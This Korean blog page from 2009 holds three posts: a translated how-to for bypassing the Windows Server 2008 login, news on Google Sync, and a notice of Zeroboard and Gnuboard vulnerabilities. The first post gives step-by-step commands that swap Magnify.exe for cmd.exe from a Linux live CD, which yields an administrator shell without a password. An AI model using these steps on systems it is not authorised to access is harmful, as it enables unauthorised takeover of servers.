간혹 로컬에서 인증이 필요 없이 Windows Server 2008에 접근을 할 이유가 생길 수 있습니다. 전 관리자가 패스워드를 알려 주지 않고 나갔다던지 아니면 나쁜짓을 하기 위해 IDC에 침입(?) 해서 작업을 하시던지 여러 이유들은 많이 있겠죠.
아래의 방법은 암호 인증을 우회하는 방법에 대한 매우 짧은 번역글 입니다.
준비물 : NTFS-3G 드라이버를 제공하는 리눅스 라이브 시디
1. 리눅스 라이브 시디로 부팅을 합니다.
2. fdisk -l | grep NTFS ( NTFS를 제대로 인식했는지 확인 및 몇번 hdd 인지 체크)
3. mkdir -p /mnt/windows (마운트를 위한 디렉토리 생성)
4. mount -t ntfs-3g /dev/sda1/mnt/windows
5. cd /mnt/windows/system32/
6. mv Magnify.exe Magnify.bck
7. cp cmd.exe Magnify.exe
8. reboot
다시 Windows Server 2008 로 접근 하면 인증없이 관리자 권한으로 접근하는 것을 확인 할 수 있다고 합니다 .
참고로 저는 아직 테스트를 하지는 않았고 원본 문서에 접근하시면 더 자세한 설명을 확인 하실 수 있습니다.
원본 : http://milw0rm.com/papers/286
글 검색 결과
- 2009/02/13 Windows Server 2008 암호 인증 통과 하기
- 2009/02/10 ZeroboardXE 1.1.5 XSS 취약점 발표
- 2009/02/10 구글 싱크가 발표 되었네요. ( WM 및 Iphone 등 동기화 )
- 2009/02/10 FM2 첫롤
- 2009/02/06 제로보드 및 그누보드 원격 취약점
구글 싱크가 발표 되었네요. ( WM 및 Iphone 등 동기화 )
드디어 기다리던 구글 싱크가 발표 되었네요. 꼭 필요한 기능인데 왜 없을까 의아했는데
이제서라도 사용할 수 있으니 다행인듯 하네요.
지원 되는 디바이스는 다음과 같습니다.
저의 경우는 기존에 nuevasync 를 이용해 싱크를 했었는데 이제는 바로 구글 싱크를 이용할 수 있다고 하니 방금 바꿨습니다. 뭐 nuevasync와의 더 좋은 점이나 차이점등은 보이지 않는거 같고요. (당연한 이야기지만 둘다 Exchange를 기반으로 두고 있으니깐요.)
아이팟으로 테스트 결과 우선 Contacts와 Calendar 만 연동이 되며 Mail은 아이팟 안의 설정에 원래 기본으로 들어가 있습니다. ( 저는 뭣도 모르고 처음에 계정 지우고 시작했다가 난감했다죠.)
- 이 글의 트랙백 주소
- http://www.basaaja.com/trackback/583
add
- 댓글 남기기
제로보드 및 그누보드 원격 취약점
공개보드의 위험성을 또 다시 증명 하네요. 제로보드는 현재 0Day 공격이 진행 중이고
그누보드는 패치가 발표 되었네요 .
취약 버젼 : zeroboard VERSION pl8 (07.12.17))
Blind SQL Injection Vulnerability - zeroboard
Secret post view Auth bypass Vulnerability - zeroboard
Local file Inclusion Vulnerability - zeroboard
XSS -Gnuboard
Remote file Inclusion Vulnerability -Gnuboard
등의 위험성이 있다고 고지 되어 있네요. 관리 하시는 분들 서버를 체크하셔야 할듯합니다.
http://milw0rm.com/exploits/8000
- 이 글의 트랙백 주소
- 이 글에는 트랙백을 보낼 수 없습니다
add
- 댓글 남기기
